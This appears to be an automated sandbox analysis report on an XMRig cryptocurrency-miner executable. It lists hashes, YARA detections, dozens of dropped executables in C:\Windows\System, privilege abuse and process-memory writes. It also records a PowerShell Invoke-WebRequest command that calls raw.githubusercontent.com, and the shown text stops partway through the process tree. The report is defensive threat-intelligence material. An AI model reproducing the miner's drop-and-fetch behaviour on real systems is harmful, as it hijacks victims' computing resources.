xmrig | 4fff371769c914176c494c274b36d217b3274bc215873d830fcd7318e580d39a

Analysis

max time kernel
138s
max time network
129s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
14/05/2024, 20:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
Size

2.8MB
MD5

1b11a933fff3592feee845e1779e3520
SHA1

1def0b550cbcd1527cf5d78d86987a50103cb2f3
SHA256

4fff371769c914176c494c274b36d217b3274bc215873d830fcd7318e580d39a
SHA512

84651e80609f25718137e086f9600c73fe8b223174224d6b52344e69a9abd88ce05ccdfe5a00040ce125b7c77025b0e3dd7ab5239df599de8a7f5b7861c94689
SSDEEP

49152:S1G1NtyBwTI3ySZbrkXV1etEKLlWUTOfeiRA2R76zHrWax9hMkFfdk2a2EXtgYo:S1ONtyBeSFkXV1etEKLlWUTOfeiRA2Rk

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral2/memory/2600-0-0x00007FF6368A0000-0x00007FF636C96000-memory.dmp	xmrig
behavioral2/files/0x000b00000002340a-5.dat	xmrig
behavioral2/memory/1684-13-0x00007FF6B98A0000-0x00007FF6B9C96000-memory.dmp	xmrig
behavioral2/files/0x0007000000023419-21.dat	xmrig
behavioral2/files/0x0007000000023417-29.dat	xmrig
behavioral2/files/0x0008000000023413-19.dat	xmrig
behavioral2/files/0x000700000002341a-33.dat	xmrig
behavioral2/files/0x0007000000023421-57.dat	xmrig
behavioral2/files/0x000700000002341f-52.dat	xmrig
behavioral2/files/0x000700000002341e-49.dat	xmrig
behavioral2/files/0x0007000000023418-47.dat	xmrig
behavioral2/files/0x000700000002341c-42.dat	xmrig
behavioral2/files/0x0007000000023420-56.dat	xmrig
behavioral2/files/0x000700000002341b-34.dat	xmrig
behavioral2/memory/4648-82-0x00007FF766190000-0x00007FF766586000-memory.dmp	xmrig
behavioral2/memory/4320-88-0x00007FF782180000-0x00007FF782576000-memory.dmp	xmrig
behavioral2/files/0x0007000000023424-110.dat	xmrig
behavioral2/files/0x000700000002342c-124.dat	xmrig
behavioral2/memory/1696-135-0x00007FF629200000-0x00007FF6295F6000-memory.dmp	xmrig
behavioral2/memory/5000-140-0x00007FF740950000-0x00007FF740D46000-memory.dmp	xmrig
behavioral2/memory/4000-144-0x00007FF7B7A10000-0x00007FF7B7E06000-memory.dmp	xmrig
behavioral2/memory/1672-147-0x00007FF784240000-0x00007FF784636000-memory.dmp	xmrig
behavioral2/memory/1060-151-0x00007FF62BB10000-0x00007FF62BF06000-memory.dmp	xmrig
behavioral2/memory/3984-152-0x00007FF639890000-0x00007FF639C86000-memory.dmp	xmrig
behavioral2/memory/2924-150-0x00007FF7F07E0000-0x00007FF7F0BD6000-memory.dmp	xmrig
behavioral2/memory/1760-149-0x00007FF7541E0000-0x00007FF7545D6000-memory.dmp	xmrig
behavioral2/memory/2848-148-0x00007FF6541B0000-0x00007FF6545A6000-memory.dmp	xmrig
behavioral2/memory/888-145-0x00007FF796CD0000-0x00007FF7970C6000-memory.dmp	xmrig
behavioral2/memory/4852-143-0x00007FF61EF40000-0x00007FF61F336000-memory.dmp	xmrig
behavioral2/memory/3956-142-0x00007FF7FCFE0000-0x00007FF7FD3D6000-memory.dmp	xmrig
behavioral2/memory/3224-141-0x00007FF6028C0000-0x00007FF602CB6000-memory.dmp	xmrig
behavioral2/memory/2120-139-0x00007FF6C0C30000-0x00007FF6C1026000-memory.dmp	xmrig
behavioral2/memory/1580-138-0x00007FF6CF040000-0x00007FF6CF436000-memory.dmp	xmrig
behavioral2/files/0x0007000000023429-133.dat	xmrig
behavioral2/files/0x000700000002342b-131.dat	xmrig
behavioral2/files/0x0007000000023425-129.dat	xmrig
behavioral2/files/0x0007000000023427-127.dat	xmrig
behavioral2/memory/3596-126-0x00007FF678AF0000-0x00007FF678EE6000-memory.dmp	xmrig
behavioral2/memory/440-125-0x00007FF706D80000-0x00007FF707176000-memory.dmp	xmrig
behavioral2/files/0x0007000000023426-122.dat	xmrig
behavioral2/memory/4628-117-0x00007FF76B920000-0x00007FF76BD16000-memory.dmp	xmrig
behavioral2/files/0x0007000000023423-107.dat	xmrig
behavioral2/memory/1404-104-0x00007FF7D09C0000-0x00007FF7D0DB6000-memory.dmp	xmrig
behavioral2/files/0x0007000000023428-96.dat	xmrig
behavioral2/files/0x0007000000023422-91.dat	xmrig
behavioral2/files/0x000700000002341d-89.dat	xmrig
behavioral2/memory/2136-66-0x00007FF6508D0000-0x00007FF650CC6000-memory.dmp	xmrig
behavioral2/files/0x000800000002342a-162.dat	xmrig
behavioral2/files/0x000700000002342f-183.dat	xmrig
behavioral2/files/0x0007000000023436-201.dat	xmrig
behavioral2/files/0x000700000002343e-230.dat	xmrig
behavioral2/files/0x000700000002343d-221.dat	xmrig
behavioral2/files/0x000700000002343b-215.dat	xmrig
behavioral2/files/0x0007000000023439-205.dat	xmrig
behavioral2/files/0x0007000000023434-196.dat	xmrig
behavioral2/files/0x0007000000023433-195.dat	xmrig
behavioral2/files/0x0007000000023430-189.dat	xmrig
behavioral2/files/0x000700000002342e-175.dat	xmrig
behavioral2/memory/3200-171-0x00007FF7DEAF0000-0x00007FF7DEEE6000-memory.dmp	xmrig
behavioral2/memory/1684-2359-0x00007FF6B98A0000-0x00007FF6B9C96000-memory.dmp	xmrig
behavioral2/memory/1684-2363-0x00007FF6B98A0000-0x00007FF6B9C96000-memory.dmp	xmrig
behavioral2/memory/4648-2364-0x00007FF766190000-0x00007FF766586000-memory.dmp	xmrig
behavioral2/memory/1672-2365-0x00007FF784240000-0x00007FF784636000-memory.dmp	xmrig
behavioral2/memory/2136-2366-0x00007FF6508D0000-0x00007FF650CC6000-memory.dmp	xmrig

Blocklisted process makes network request 7 IoCs

flow	pid	Process
8	4844	powershell.exe
10	4844	powershell.exe
12	4844	powershell.exe
13	4844	powershell.exe
15	4844	powershell.exe
26	4844	powershell.exe
27	4844	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
4844	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
1684	iCVounF.exe
2136	NblMzuG.exe
1672	AcwiYAF.exe
4648	kxGllRz.exe
4320	UXjvTVk.exe
1404	uHkckiI.exe
4628	jNSKPnX.exe
440	skMGGJl.exe
3596	UOCnMSX.exe
1696	eJySvGm.exe
2848	uoExbgp.exe
1580	EvlMJma.exe
2120	CKNHeSl.exe
5000	KuSzubG.exe
1760	oyXpyRc.exe
3224	YBZYhto.exe
2924	wPDROTt.exe
3956	ghpEmNU.exe
4852	qMfifUK.exe
4000	FUnRrgG.exe
1060	HupkYoB.exe
3984	RcMFWsw.exe
888	LeyhJAX.exe
3200	ezjbeGa.exe
1964	XFCiZXn.exe
2692	puHVTYr.exe
4580	FeVlXiG.exe
1872	dKFQFsM.exe
3668	IoJYpyq.exe
2644	IwaEaON.exe
4448	WuqdLTO.exe
4464	AhRHCBo.exe
3348	GLTBeiu.exe
2700	gvuhPne.exe
2588	rKSyRJa.exe
5084	AbMrFhZ.exe
4180	zbguIMB.exe
4272	UTgzdhg.exe
4920	BFKisak.exe
1168	typcjkw.exe
1504	GpUMBpp.exe
1148	XvNPDTB.exe
2268	MbDTtAa.exe
1472	XbsCQMi.exe
4516	TNDPjkp.exe
4092	gNeaJxt.exe
5088	MXTTynt.exe
3044	xkvTRJQ.exe
3244	pJUNoTI.exe
3464	cMYilMO.exe
4264	JksMoZq.exe
3156	CDxlleW.exe
1808	vcIEKuv.exe
3788	AhiACpz.exe
2292	nzljVbW.exe
4504	ajmaLDT.exe
1624	yeTPdUA.exe
2524	FWnsnbG.exe
4532	oOjIqWq.exe
1952	ZHWJyaR.exe
2768	mMvTUzP.exe
2780	OviuWPT.exe
4392	uQNmsXZ.exe
3524	iQwZUdN.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2600-0-0x00007FF6368A0000-0x00007FF636C96000-memory.dmp	upx
behavioral2/files/0x000b00000002340a-5.dat	upx
behavioral2/memory/1684-13-0x00007FF6B98A0000-0x00007FF6B9C96000-memory.dmp	upx
behavioral2/files/0x0007000000023419-21.dat	upx
behavioral2/files/0x0007000000023417-29.dat	upx
behavioral2/files/0x0008000000023413-19.dat	upx
behavioral2/files/0x000700000002341a-33.dat	upx
behavioral2/files/0x0007000000023421-57.dat	upx
behavioral2/files/0x000700000002341f-52.dat	upx
behavioral2/files/0x000700000002341e-49.dat	upx
behavioral2/files/0x0007000000023418-47.dat	upx
behavioral2/files/0x000700000002341c-42.dat	upx
behavioral2/files/0x0007000000023420-56.dat	upx
behavioral2/files/0x000700000002341b-34.dat	upx
behavioral2/memory/4648-82-0x00007FF766190000-0x00007FF766586000-memory.dmp	upx
behavioral2/memory/4320-88-0x00007FF782180000-0x00007FF782576000-memory.dmp	upx
behavioral2/files/0x0007000000023424-110.dat	upx
behavioral2/files/0x000700000002342c-124.dat	upx
behavioral2/memory/1696-135-0x00007FF629200000-0x00007FF6295F6000-memory.dmp	upx
behavioral2/memory/5000-140-0x00007FF740950000-0x00007FF740D46000-memory.dmp	upx
behavioral2/memory/4000-144-0x00007FF7B7A10000-0x00007FF7B7E06000-memory.dmp	upx
behavioral2/memory/1672-147-0x00007FF784240000-0x00007FF784636000-memory.dmp	upx
behavioral2/memory/1060-151-0x00007FF62BB10000-0x00007FF62BF06000-memory.dmp	upx
behavioral2/memory/3984-152-0x00007FF639890000-0x00007FF639C86000-memory.dmp	upx
behavioral2/memory/2924-150-0x00007FF7F07E0000-0x00007FF7F0BD6000-memory.dmp	upx
behavioral2/memory/1760-149-0x00007FF7541E0000-0x00007FF7545D6000-memory.dmp	upx
behavioral2/memory/2848-148-0x00007FF6541B0000-0x00007FF6545A6000-memory.dmp	upx
behavioral2/memory/888-145-0x00007FF796CD0000-0x00007FF7970C6000-memory.dmp	upx
behavioral2/memory/4852-143-0x00007FF61EF40000-0x00007FF61F336000-memory.dmp	upx
behavioral2/memory/3956-142-0x00007FF7FCFE0000-0x00007FF7FD3D6000-memory.dmp	upx
behavioral2/memory/3224-141-0x00007FF6028C0000-0x00007FF602CB6000-memory.dmp	upx
behavioral2/memory/2120-139-0x00007FF6C0C30000-0x00007FF6C1026000-memory.dmp	upx
behavioral2/memory/1580-138-0x00007FF6CF040000-0x00007FF6CF436000-memory.dmp	upx
behavioral2/files/0x0007000000023429-133.dat	upx
behavioral2/files/0x000700000002342b-131.dat	upx
behavioral2/files/0x0007000000023425-129.dat	upx
behavioral2/files/0x0007000000023427-127.dat	upx
behavioral2/memory/3596-126-0x00007FF678AF0000-0x00007FF678EE6000-memory.dmp	upx
behavioral2/memory/440-125-0x00007FF706D80000-0x00007FF707176000-memory.dmp	upx
behavioral2/files/0x0007000000023426-122.dat	upx
behavioral2/memory/4628-117-0x00007FF76B920000-0x00007FF76BD16000-memory.dmp	upx
behavioral2/files/0x0007000000023423-107.dat	upx
behavioral2/memory/1404-104-0x00007FF7D09C0000-0x00007FF7D0DB6000-memory.dmp	upx
behavioral2/files/0x0007000000023428-96.dat	upx
behavioral2/files/0x0007000000023422-91.dat	upx
behavioral2/files/0x000700000002341d-89.dat	upx
behavioral2/memory/2136-66-0x00007FF6508D0000-0x00007FF650CC6000-memory.dmp	upx
behavioral2/files/0x000800000002342a-162.dat	upx
behavioral2/files/0x000700000002342f-183.dat	upx
behavioral2/files/0x0007000000023436-201.dat	upx
behavioral2/files/0x000700000002343e-230.dat	upx
behavioral2/files/0x000700000002343d-221.dat	upx
behavioral2/files/0x000700000002343b-215.dat	upx
behavioral2/files/0x0007000000023439-205.dat	upx
behavioral2/files/0x0007000000023434-196.dat	upx
behavioral2/files/0x0007000000023433-195.dat	upx
behavioral2/files/0x0007000000023430-189.dat	upx
behavioral2/files/0x000700000002342e-175.dat	upx
behavioral2/memory/3200-171-0x00007FF7DEAF0000-0x00007FF7DEEE6000-memory.dmp	upx
behavioral2/memory/1684-2359-0x00007FF6B98A0000-0x00007FF6B9C96000-memory.dmp	upx
behavioral2/memory/1684-2363-0x00007FF6B98A0000-0x00007FF6B9C96000-memory.dmp	upx
behavioral2/memory/4648-2364-0x00007FF766190000-0x00007FF766586000-memory.dmp	upx
behavioral2/memory/1672-2365-0x00007FF784240000-0x00007FF784636000-memory.dmp	upx
behavioral2/memory/2136-2366-0x00007FF6508D0000-0x00007FF650CC6000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	raw.githubusercontent.com
8	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\EcuCtUQ.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\RnSMjcL.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\oMeKVza.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\GUsLXrE.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\rnVgkTG.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\fznhpON.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\MwwUPcN.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\JHEkLyz.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\nowvvZx.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\qyPvKPT.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\sckWoSG.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\OdpOxzN.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\XnAuoNe.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\lqOKdQU.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\nBgSBAV.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\NFeztsT.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\TJubHBE.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\YOoKvaX.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\WLfgbjG.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\OGuuBvi.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\TOoYcmn.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\fEHyyXj.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\wqTfYoO.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\quMkdiS.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\IhAiGjo.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\hfNUcrY.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\qYfFbLI.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\DDevmdz.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\ajHuyfT.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\WeAxwaf.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\SZcbwyx.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\lXzWvNN.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\VBsspIN.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\ELgXqLB.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\nCNfUfj.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\HAlNeNB.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\DDIvqIS.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\dekPQjY.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\QVdWuny.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\xVXeSdd.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\oeYHLlf.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\SXJGRCd.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\PUwzdfS.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\thBbYkD.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\TTtbGyY.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\gzBgCqr.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\BaNoRYz.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\JndLbPY.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\fPErEmq.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\AzJYVZz.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\CqDTebK.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\cpzgsLk.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\uzZGToY.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\mZBCNnm.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\CdzonWi.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\yWvFdPR.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\JUJuuHq.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\QmQDZLB.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\YFFHYIt.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\gXwUQLl.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\wsVLqYe.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\wsDMKjr.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\DArQMqI.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
File created	C:\Windows\System\WnVWJHG.exe	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
4844	powershell.exe
4844	powershell.exe
4844	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
Token: SeDebugPrivilege	4844	powershell.exe
Token: SeLockMemoryPrivilege	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2600 wrote to memory of 4844	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	84
PID 2600 wrote to memory of 4844	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	84
PID 2600 wrote to memory of 1684	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	85
PID 2600 wrote to memory of 1684	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	85
PID 2600 wrote to memory of 2136	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	86
PID 2600 wrote to memory of 2136	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	86
PID 2600 wrote to memory of 1672	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	87
PID 2600 wrote to memory of 1672	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	87
PID 2600 wrote to memory of 4320	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	88
PID 2600 wrote to memory of 4320	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	88
PID 2600 wrote to memory of 4648	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	89
PID 2600 wrote to memory of 4648	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	89
PID 2600 wrote to memory of 1404	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	90
PID 2600 wrote to memory of 1404	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	90
PID 2600 wrote to memory of 4628	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	91
PID 2600 wrote to memory of 4628	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	91
PID 2600 wrote to memory of 440	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	92
PID 2600 wrote to memory of 440	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	92
PID 2600 wrote to memory of 2120	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	93
PID 2600 wrote to memory of 2120	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	93
PID 2600 wrote to memory of 3596	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	94
PID 2600 wrote to memory of 3596	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	94
PID 2600 wrote to memory of 1696	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	95
PID 2600 wrote to memory of 1696	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	95
PID 2600 wrote to memory of 2848	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	96
PID 2600 wrote to memory of 2848	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	96
PID 2600 wrote to memory of 1580	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	97
PID 2600 wrote to memory of 1580	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	97
PID 2600 wrote to memory of 5000	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	98
PID 2600 wrote to memory of 5000	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	98
PID 2600 wrote to memory of 1760	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	99
PID 2600 wrote to memory of 1760	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	99
PID 2600 wrote to memory of 3224	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	100
PID 2600 wrote to memory of 3224	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	100
PID 2600 wrote to memory of 2924	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	101
PID 2600 wrote to memory of 2924	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	101
PID 2600 wrote to memory of 3956	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	102
PID 2600 wrote to memory of 3956	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	102
PID 2600 wrote to memory of 4852	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	103
PID 2600 wrote to memory of 4852	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	103
PID 2600 wrote to memory of 4000	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	104
PID 2600 wrote to memory of 4000	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	104
PID 2600 wrote to memory of 1060	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	105
PID 2600 wrote to memory of 1060	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	105
PID 2600 wrote to memory of 3984	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	106
PID 2600 wrote to memory of 3984	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	106
PID 2600 wrote to memory of 888	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	107
PID 2600 wrote to memory of 888	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	107
PID 2600 wrote to memory of 3200	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	108
PID 2600 wrote to memory of 3200	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	108
PID 2600 wrote to memory of 1964	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	109
PID 2600 wrote to memory of 1964	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	109
PID 2600 wrote to memory of 2692	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	110
PID 2600 wrote to memory of 2692	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	110
PID 2600 wrote to memory of 4580	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	111
PID 2600 wrote to memory of 4580	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	111
PID 2600 wrote to memory of 1872	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	112
PID 2600 wrote to memory of 1872	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	112
PID 2600 wrote to memory of 3668	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	113
PID 2600 wrote to memory of 3668	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	113
PID 2600 wrote to memory of 2644	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	114
PID 2600 wrote to memory of 2644	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	114
PID 2600 wrote to memory of 4448	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	115
PID 2600 wrote to memory of 4448	2600	1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe	115

C:\Users\Admin\AppData\Local\Temp\1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\1b11a933fff3592feee845e1779e3520_NeikiAnalytics.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2600
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4844
- C:\Windows\System\iCVounF.exe
  C:\Windows\System\iCVounF.exe
  2⤵
  - Executes dropped EXE
  PID:1684
- C:\Windows\System\NblMzuG.exe
  C:\Windows\System\NblMzuG.exe
  2⤵
  - Executes dropped EXE
  PID:2136
- C:\Windows\System\AcwiYAF.exe
  C:\Windows\System\AcwiYAF.exe
  2⤵
  - Executes dropped EXE
  PID:1672
- C:\Windows\System\UXjvTVk.exe
  C:\Windows\System\UXjvTVk.exe
  2⤵
  - Executes dropped EXE
  PID:4320
- C:\Windows\System\kxGllRz.exe
  C:\Windows\System\kxGllRz.exe
  2⤵
  - Executes dropped EXE
  PID:4648
- C:\Windows\System\uHkckiI.exe
  C:\Windows\System\uHkckiI.exe
  2⤵
  - Executes dropped EXE
  PID:1404
- C:\Windows\System\jNSKPnX.exe
  C:\Windows\System\jNSKPnX.exe
  2⤵
  - Executes dropped EXE
  PID:4628
- C:\Windows\System\skMGGJl.exe
  C:\Windows\System\skMGGJl.exe
  2⤵
  - Executes dropped EXE
  PID:440
- C:\Windows\System\CKNHeSl.exe
  C:\Windows\System\CKNHeSl.exe
  2⤵
  - Executes dropped EXE
  PID:2120
- C:\Windows\System\UOCnMSX.exe
  C:\Windows\System\UOCnMSX.exe
  2⤵
  - Executes dropped EXE
  PID:3596
- C:\Windows\System\eJySvGm.exe
  C:\Windows\System\eJySvGm.exe
  2⤵
  - Executes dropped EXE
  PID:1696
- C:\Windows\System\uoExbgp.exe
  C:\Windows\System\uoExbgp.exe
  2⤵
  - Executes dropped EXE
  PID:2848
- C:\Windows\System\EvlMJma.exe
  C:\Windows\System\EvlMJma.exe
  2⤵
  - Executes dropped EXE
  PID:1580
- C:\Windows\System\KuSzubG.exe
  C:\Windows\System\KuSzubG.exe
  2⤵
